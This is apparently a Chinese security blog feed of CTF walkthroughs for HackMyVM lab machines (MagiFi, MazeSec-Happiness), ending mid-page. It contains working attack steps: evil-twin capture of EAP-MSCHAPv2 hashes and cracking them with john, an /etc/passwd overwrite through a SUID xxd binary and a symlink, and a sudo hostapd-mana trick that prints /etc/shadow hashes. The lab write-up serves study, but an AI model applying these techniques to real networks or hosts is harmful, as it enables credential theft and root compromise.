Using interface wlan1 with hwaddr 02:00:00:00:01:00 and ssid "wifi-college"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED 
wlan1: STA 64:32:a8:07:6c:41 IEEE 802.11: authenticated
wlan1: STA 64:32:a8:07:6c:41 IEEE 802.11: associated (aid 1)
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:41
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: Hogwarts\albus.dumbledore
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: Hogwarts\albus.dumbledore
MANA EAP EAP-MSCHAPV2 ASLEAP user=albus.dumbledore | asleap -C 44:4f:6d:dc:28:55:c3:8c -R 05:58:4f:62:63:a5:1e:1b:54:87:96:29:6a:3a:62:85:1d:86:b8:d8:c4:d3:c2:70
MANA EAP EAP-MSCHAPV2 JTR | albus.dumbledore:$NETNTLM$444f6ddc2855c38c$05584f6263a51e1b548796296a3a62851d86b8d8c4d3c270:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | albus.dumbledore::::05584f6263a51e1b548796296a3a62851d86b8d8c4d3c270:444f6ddc2855c38c
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 0e 21 42 cf 50 0c fa 6e fb 8d a1 8d d8 63 0b 69
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: authenticated
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: authenticated
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: associated (aid 1)
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:43
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: associated (aid 2)
MANA EAP Identity Phase 0: Hogwarts\tom.riddle
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:40
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: Hogwarts\rubeus.hagrid
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: Hogwarts\tom.riddle
MANA EAP EAP-MSCHAPV2 ASLEAP user=tom.riddle | asleap -C 29:da:39:7f:92:3f:f3:cf -R 12:33:3f:27:9b:59:d0:71:7c:85:35:c5:73:ca:5b:32:c9:62:32:01:92:a0:22:76
MANA EAP EAP-MSCHAPV2 JTR | tom.riddle:$NETNTLM$29da397f923ff3cf$12333f279b59d0717c8535c573ca5b32c962320192a02276:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | tom.riddle::::12333f279b59d0717c8535c573ca5b32c962320192a02276:29da397f923ff3cf
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 46 eb 92 c2 3e 75 f9 46 3e be d0 1f 04 76 b3 1c
MANA EAP Identity Phase 1: Hogwarts\rubeus.hagrid
MANA EAP EAP-MSCHAPV2 ASLEAP user=rubeus.hagrid | asleap -C 19:af:04:38:b5:3a:d2:f5 -R d1:b3:15:89:62:4c:ec:35:5f:0e:2a:dc:7c:3b:6f:be:22:80:fc:f4:d5:25:cd:5f
MANA EAP EAP-MSCHAPV2 JTR | rubeus.hagrid:$NETNTLM$19af0438b53ad2f5$d1b31589624cec355f0e2adc7c3b6fbe2280fcf4d525cd5f:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | rubeus.hagrid::::d1b31589624cec355f0e2adc7c3b6fbe2280fcf4d525cd5f:19af0438b53ad2f5
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): f4 16 05 b7 06 06 72 54 44 73 58 ba 18 74 69 c2
wlan1: STA 64:32:a8:07:6c:42 IEEE 802.11: authenticated
wlan1: STA 64:32:a8:07:6c:42 IEEE 802.11: associated (aid 1)
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:42
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: Hogwarts\minerva.mcgonagall
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: Hogwarts\minerva.mcgonagall
MANA EAP EAP-MSCHAPV2 ASLEAP user=minerva.mcgonagall | asleap -C 25:57:75:5c:ec:b3:f8:80 -R 0b:a6:ba:03:d2:dc:76:13:b6:e5:71:bc:1a:60:5d:a7:ff:46:7d:df:9f:93:45:83
MANA EAP EAP-MSCHAPV2 JTR | minerva.mcgonagall:$NETNTLM$2557755cecb3f880$0ba6ba03d2dc7613b6e571bc1a605da7ff467ddf9f934583:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | minerva.mcgonagall::::0ba6ba03d2dc7613b6e571bc1a605da7ff467ddf9f934583:2557755cecb3f880
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 91 10 e9 a6 f4 ac 73 15 d0 0b 3b ea 11 82 7b b2
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: authenticated
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: associated (aid 1)
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:43
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: Hogwarts\tom.riddle
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: Hogwarts\tom.riddle
MANA EAP EAP-MSCHAPV2 ASLEAP user=tom.riddle | asleap -C cd:28:fa:20:e8:bc:be:2b -R 5a:4b:35:fb:9d:cc:e6:32:7c:d8:79:64:6d:5f:47:c1:db:cf:d9:99:31:a7:26:87
MANA EAP EAP-MSCHAPV2 JTR | tom.riddle:$NETNTLM$cd28fa20e8bcbe2b$5a4b35fb9dcce6327cd879646d5f47c1dbcfd99931a72687:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | tom.riddle::::5a4b35fb9dcce6327cd879646d5f47c1dbcfd99931a72687:cd28fa20e8bcbe2b
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): fb a5 56 4a 59 98 41 70 7b a1 d6 d4 89 67 ee ff

里面包含了四个用户： tom.riddle, rubeus.hagrid，minerva.mcgonagall, albus.dumbledore，尝试破译：

┌──(kali㉿kali)-[~/temp/Magifi]
└─$ cat hash                                                   
albus.dumbledore::::05584f6263a51e1b548796296a3a62851d86b8d8c4d3c270:444f6ddc2855c38c
tom.riddle::::12333f279b59d0717c8535c573ca5b32c962320192a02276:29da397f923ff3cf
rubeus.hagrid::::d1b31589624cec355f0e2adc7c3b6fbe2280fcf4d525cd5f:19af0438b53ad2f5
minerva.mcgonagall::::0ba6ba03d2dc7613b6e571bc1a605da7ff467ddf9f934583:2557755cecb3f880
tom.riddle::::5a4b35fb9dcce6327cd879646d5f47c1dbcfd99931a72687:cd28fa20e8bcbe2b

┌──(kali㉿kali)-[~/temp/Magifi]
└─$ john -w=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "netntlm", but the string is also recognized as "netntlm-naive"
Use the "--format=netntlm-naive" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (netntlm, NTLMv1 C/R [MD4 DES (ESS MD5) 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
blackhogwarts    (tom.riddle)     
blackhogwarts    (tom.riddle)     
2g 0:00:00:03 DONE (2025-06-22 09:30) 0.6134g/s 4399Kp/s 19087Kc/s 19087KC/s !!!dakkungnoy..*7¡Vamos!
Use the "--show --format=netntlm" options to display all of the cracked passwords reliably
Session completed.

其中只有用户tom.riddle的密码可以破译出来，为blackhogwarts，尝试进行登录：

提权-root

进入机器后，我会寻找启用 SUID 位的二进制文件：

收到

find / -perm -4000 2>/dev/null

收到

harry_potter@MagiFi:~$ find / -perm -4000 2>/dev/null
/usr/bin/xxd_horcrux
/home/tom.riddle/.horcrux.png
harry_potter@MagiFi:~$

tom.riddle@MagiFi:~$ /usr/bin/xxd_horcrux
Usage:
       xxd [options] [infile [outfile]]
    or
       xxd -r [-s [-]offset] [-c cols] [-ps] [infile [outfile]]
Options:
    -a          toggle autoskip: A single '*' replaces nul-lines. Default off.
    -b          binary digit dump (incompatible with -ps,-i,-r). Default hex.
    -C          capitalize variable names in C include file style (-i).
    -c cols     format <cols> octets per line. Default 16 (-i: 12, -ps: 30).
    -E          show characters in EBCDIC. Default ASCII.
    -e          little-endian dump (incompatible with -ps,-i,-r).
    -g          number of octets per group in normal output. Default 2 (-e: 4).
    -h          print this summary.
    -i          output in C include file style.
    -l len      stop after <len> octets.
    -o off      add <off> to the displayed file position.
    -ps         output in postscript plain hexdump style.
    -r          reverse operation: convert (or patch) hexdump into binary.
    -r -s off   revert with <off> added to file positions found in hexdump.
    -s [+][-]seek  start at <seek> bytes abs. (or +: rel.) infile offset.
    -u          use upper case hex letters.
    -v          show version: "xxd V1.10 27oct98 by Juergen Weigert".
    -O <file>   specify output file (only horcruxes are allowed).

显然 -O 选项说我们只能留下一个叫“魂器”（或类似）的外文件，我们还看到另一个启用 suid 位的二进制文件叫做 .horcrux.png。了解这一点后，我们可以利用 go 中带有 xxd 的读取文件，具体如下：

首先我们将 /etc/passwd 文件复制到当前目录：

cp /etc/passwd /tmp/root

然后，我们创建一个名为 .horcrux.png with touch的文件：

touch .horcrux.png

现在我们将 /etc/passwd 文件与 .horcrux.png 文件进行符号链接，这样写入时实际上是在修改 /etc/ 文件：

ln -sf /etc/passwd /tmp/root/.horcrux.png

现在我们修改复制的 passwd，使其成为被覆盖在 .horcrux.png 文件中的内容，正如我之前说的，这将修改 /etc/passwd 文件：

sed 's/root:x:/root::/g' -i /tmp/root/passwd

最后，我们利用 xxd_horcrux 二进制文件，覆盖了 /etc/passwd 文件，这样就能运行并无密码扩展到 root：

cat /tmp/root/passwd | xxd | /bin/xxd_horcrux -r -O .horcrux.png

root@MagiFi:~# cat root_flag_as5df.txt 
hogwarts{5ed0818c0181fe97f744d7b1b51dd9c7}

成功

tom.riddle@MagiFi:~$ /usr/bin/xxd_horcrux -r /tmp/2bash.hex -O .horcrux.png
tom.riddle@MagiFi:~$ ls -la
total 48
drwxr-xr-x 3 tom.riddle tom.riddle  4096 Jun 22 15:14 .
drwxr-xr-x 7 root       root        4096 Sep 27  2024 ..
lrwxrwxrwx 1 root       root           9 Sep 27  2024 .bash_history -> /dev/null
-rw-r--r-- 1 tom.riddle tom.riddle   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 tom.riddle tom.riddle  3771 Feb 25  2020 .bashrc
drwx------ 2 tom.riddle tom.riddle  4096 Feb  4 09:57 .cache
-rwsr-x--x 1 root       tom.riddle 17136 Jun 22 15:24 .horcrux.png
-rw-r--r-- 1 tom.riddle tom.riddle   807 Feb 25  2020 .profile
-rw------- 1 tom.riddle tom.riddle  1184 Jun 22 15:14 .viminfo
tom.riddle@MagiFi:~$ ./.horcrux.png 
bash: ./.horcrux.png: cannot execute binary file: Exec format error
tom.riddle@MagiFi:~$ /usr/bin/xxd_horcrux -r /tmp/2bash.hex -O .horcrux.png
tom.riddle@MagiFi:~$ ./.horcrux.png 
root@MagiFi:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),1004(tom.riddle)

提权-Bug1

(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$ sudo -l
Matching Defaults entries for harry_potter on MagiFi:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User harry_potter may run the following commands on
        MagiFi:
    (root) NOPASSWD: /usr/sbin/aireplay-ng,
        /usr/sbin/airmon-ng, /usr/sbin/airodump-ng,
        /usr/bin/airdecap-ng, /usr/bin/hostapd-mana

(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$ sudo /usr/bin/hostapd-mana -h
hostapd-mana v2.6
User space daemon for IEEE 802.11 AP management,
IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator
Copyright (c) 2002-2016, Jouni Malinen <j@w1.fi> and contributors
--------------------------------------------------
MANA https://github.com/sensepost/hostapd-mana
By @singe (dominic@sensepost.com)
Original MANA EAP by Ian (ian@sensepost.com)
Original karma patches by Robin Wood - robin@digininja.org
Original EAP patches by Brad Antoniewicz @brad_anton
Sycophant by Michael Kruger @_cablethief
usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] \
         [-g <global ctrl_iface>] [-G <group>]\
         [-i <comma-separated list of interface names>]\
         <configuration file(s)>

options:
   -h   show this usage
   -d   show more debug messages (-dd for even more)
   -B   run daemon in the background
   -e   entropy file
   -g   global control interface path
   -G   group for control interfaces
   -P   PID file
   -K   include key data in debug messages
   -i   list of interface names to use
   -S   start all the interfaces synchronously
   -t   include timestamps in some debug messages
   -v   show hostapd version

重点在于-d show more debug messages (-dd for even more)

所以可以用来读取文件

Failed to initialize interface
(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$ sudo /usr/bin/hostapd-mana /etc/shadow
Configuration file: /etc/shadow
Line 1: invalid line 'root:$6$KflwZsO6c4DW8laq$AVs2hfT9i1calD.V6aKIr5Wej26J1tjgSz5R674SSJDuWvX1RWqHYw79Q.OIqeIlhl0ksI7UJ7d0YHJp4F.J81:19993:0:99999:7:::'
Line 2: invalid line 'daemon:*:19430:0:99999:7:::'
Line 3: invalid line 'bin:*:19430:0:99999:7:::'
Line 4: invalid line 'sys:*:19430:0:99999:7:::'
Line 5: invalid line 'sync:*:19430:0:99999:7:::'
Line 6: invalid line 'games:*:19430:0:99999:7:::'
Line 7: invalid line 'man:*:19430:0:99999:7:::'
Line 8: invalid line 'lp:*:19430:0:99999:7:::'
Line 9: invalid line 'mail:*:19430:0:99999:7:::'
Line 10: invalid line 'news:*:19430:0:99999:7:::'
Line 11: invalid line 'uucp:*:19430:0:99999:7:::'
Line 12: invalid line 'proxy:*:19430:0:99999:7:::'
Line 13: invalid line 'www-data:*:19430:0:99999:7:::'
Line 14: invalid line 'backup:*:19430:0:99999:7:::'
Line 15: invalid line 'list:*:19430:0:99999:7:::'
Line 16: invalid line 'irc:*:19430:0:99999:7:::'
Line 17: invalid line 'gnats:*:19430:0:99999:7:::'
Line 18: invalid line 'nobody:*:19430:0:99999:7:::'
Line 19: invalid line 'systemd-network:*:19430:0:99999:7:::'
Line 20: invalid line 'systemd-resolve:*:19430:0:99999:7:::'
Line 21: invalid line 'systemd-timesync:*:19430:0:99999:7:::'
Line 22: invalid line 'messagebus:*:19430:0:99999:7:::'
Line 23: invalid line 'syslog:*:19430:0:99999:7:::'
Line 24: invalid line '_apt:*:19430:0:99999:7:::'
Line 25: invalid line 'tss:*:19430:0:99999:7:::'
Line 26: invalid line 'uuidd:*:19430:0:99999:7:::'
Line 27: invalid line 'tcpdump:*:19430:0:99999:7:::'
Line 28: invalid line 'landscape:*:19430:0:99999:7:::'
Line 29: invalid line 'pollinate:*:19430:0:99999:7:::'
Line 30: invalid line 'fwupd-refresh:*:19430:0:99999:7:::'
Line 31: invalid line 'usbmux:*:19991:0:99999:7:::'
Line 32: invalid line 'sshd:*:19991:0:99999:7:::'
Line 33: invalid line 'systemd-coredump:!!:19991::::::'
Line 34: invalid line 'lxd:!:19991::::::'
Line 35: invalid line 'freerad:*:19991:0:99999:7:::'
Line 36: invalid line 'rubeus.hagrid:!:19991:0:99999:7:::'
Line 37: invalid line 'albus.dumbledore:!:19991:0:99999:7:::'
Line 38: invalid line 'minerva.mcgonagall:!:19991:0:99999:7:::'
Line 39: invalid line 'tom.riddle:$6$l2y72YLXF2tIL.rC$d3SQEKFlGu9wi/omLDmHJYGP3uRSD9t2hnRTqveIMOHG8pa80Ku81d3kbfXZy0bpC2PRp9xLqE7IQi3EQ4bf1/:19991:0:99999:7:::'
Line 40: invalid line 'harry_potter:$6$Cu5tGqfYYF/NWp6f$bLb5lfce4bMH10OYBG27nYBoMTMciI9NOxIR2XGliWIhzHE2iU0kS1ZKuSNPnYRS/y12jnt4jmr8pMfDsRicK1:19993:0:99999:7:::'
40 errors found in configuration file '/etc/shadow'
Failed to set up interface with /etc/shadow
Failed to initialize interface

原本可以直接读/root/root.txt 作者修复了，将root.txt更改命名格式

提权-Bug2

已修复-运行该程序先校验用户名

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/magifi/

MazeSec-Happiness

呼啸山庄 — Sun, 25 Jan 2026 00:00:00 GMT

信息收集

rustscan扫描

# rustscan -a 192.168.0.106 -- -A           
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.106:53
Open 192.168.0.106:80
Open 192.168.0.106:21
Open 192.168.0.106:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.106
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-24 01:28 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:28
Completed NSE at 01:28, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:28
Completed NSE at 01:28, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:28
Completed NSE at 01:28, 0.00s elapsed
Initiating ARP Ping Scan at 01:28
Scanning 192.168.0.106 [1 port]
Completed ARP Ping Scan at 01:28, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:28
Completed Parallel DNS resolution of 1 host. at 01:28, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:28
Scanning 192.168.0.106 [4 ports]
Discovered open port 21/tcp on 192.168.0.106
Discovered open port 80/tcp on 192.168.0.106
Discovered open port 22/tcp on 192.168.0.106

PORT   STATE  SERVICE REASON         VERSION
21/tcp open   ftp     syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.0.108
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 0        0              20 Jan 22 12:27 readme.txt
22/tcp open   ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15/h5hBsS/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9/wPmo6RBeb1d5t11SP8R5UHyI/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
|   256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
53/tcp closed domain  reset ttl 64
80/tcp open   http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:BF:9E:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/24%OT=21%CT=53%CU=43047%PV=Y%DS=1%DC=D%G=Y%M=0800
OS:27%TM=6974669D%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=105%TI=Z%CI=Z%
OS:II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11N
OS:W7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE8
OS:8%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
OS:DFI=N%T=40%CD=S)

Uptime guess: 43.869 days (since Thu Dec 11 04:37:52 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms 192.168.0.106

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:28
Completed NSE at 01:28, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:28
Completed NSE at 01:28, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:28
Completed NSE at 01:28, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.31 seconds
           Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.450KB)

目录扫描

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# gobuster dir -u 192.168.0.106 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.106
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              yaml,php,txt,html,zip,db,bak,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 19]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# dirsearch -u 192.168.0.106


  _|. _ _  _  _  _ _|_    v0.4.3.post1                  
 (_||| _) (/_(_|| (_| )                                 
                                                        
Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/hmv/reports/_192.168.0.106/_26-01-24_01-30-10.txt

Target: http://192.168.0.106/

[01:30:10] Starting:                                    
[01:30:12] 403 -  278B  - /.ht_wsr.txt
[01:30:12] 403 -  278B  - /.htaccess.orig
[01:30:12] 403 -  278B  - /.htaccess.sample
[01:30:12] 403 -  278B  - /.htaccess.bak1
[01:30:12] 403 -  278B  - /.htaccess.save
[01:30:12] 403 -  278B  - /.htaccess_extra
[01:30:12] 403 -  278B  - /.htaccess_orig
[01:30:12] 403 -  278B  - /.htaccess_sc
[01:30:12] 403 -  278B  - /.htaccessBAK
[01:30:12] 403 -  278B  - /.htm
[01:30:12] 403 -  278B  - /.html
[01:30:12] 403 -  278B  - /.htaccessOLD2
[01:30:12] 403 -  278B  - /.htaccessOLD
[01:30:12] 403 -  278B  - /.htpasswds
[01:30:12] 403 -  278B  - /.httr-oauth
[01:30:12] 403 -  278B  - /.htpasswd_test
[01:30:13] 403 -  278B  - /.php
[01:31:03] 403 -  278B  - /server-status
[01:31:03] 403 -  278B  - /server-status/

Task Completed

21端口

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# ftp 192.168.0.106     
Connected to 192.168.0.106.
220 Have fun!
Name (192.168.0.106:kali): ^C

                                                        
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# ftp anonymous@192.168.0.106
Connected to 192.168.0.106.
220 Have fun!
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11835|)
150 Here comes the directory listing.
-r--r--r--    1 0        0              20 Jan 22 12:27 readme.txt
226 Directory send OK.
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||37629|)
150 Opening BINARY mode data connection for readme.txt (20 bytes).
100% |***********|    20       32.99 KiB/s    00:00 ETA
226 Transfer complete.
20 bytes received in 00:00 (11.55 KiB/s)
ftp> exit
221 Goodbye.

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# cat readme.txt  
http://tmpfile.dsz/

vi /etc/hosts
192.168.0.106 tmpfile.dsz

二次目录扫描

gobuster dir -u http://tmpfile.dsz/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64


  _|. _ _  _  _  _ _|_    v0.4.3.post1                  
 (_||| _) (/_(_|| (_| )                                 
                                                        
Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/hmv/reports/_tmpfile.dsz/_26-01-24_01-34-18.txt

Target: http://tmpfile.dsz/

[01:34:18] Starting:                                    
[01:34:19] 403 -  276B  - /.ht_wsr.txt
[01:34:19] 403 -  276B  - /.htaccess.bak1
[01:34:19] 403 -  276B  - /.htaccess_orig
[01:34:19] 403 -  276B  - /.htaccess.orig
[01:34:19] 403 -  276B  - /.htaccess_extra
[01:34:19] 403 -  276B  - /.htaccessOLD2
[01:34:19] 403 -  276B  - /.htaccess_sc
[01:34:19] 403 -  276B  - /.htaccessOLD
[01:34:19] 403 -  276B  - /.html
[01:34:19] 403 -  276B  - /.htaccess.save
[01:34:19] 403 -  276B  - /.htpasswds
[01:34:19] 403 -  276B  - /.htm
[01:34:19] 403 -  276B  - /.httr-oauth
[01:34:19] 403 -  276B  - /.htaccess.sample
[01:34:19] 403 -  276B  - /.htpasswd_test
[01:34:19] 403 -  276B  - /.htaccessBAK
[01:34:20] 403 -  276B  - /.php
[01:34:54] 403 -  276B  - /server-status
[01:34:54] 403 -  276B  - /server-status/
[01:35:01] 301 -  312B  - /uploads  ->  http://tmpfile.dsz/uploads/
[01:35:01] 200 -  454B  - /uploads/

http://tmpfile.dsz

/index

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
        <title>MazeSec - 临时文件转存站</title>
	    <style>
	            body { font-family: sans-serif; background: #f4f4f4; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
        .container { background: #fff; padding: 30px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); width: 400px; text-align: center; }
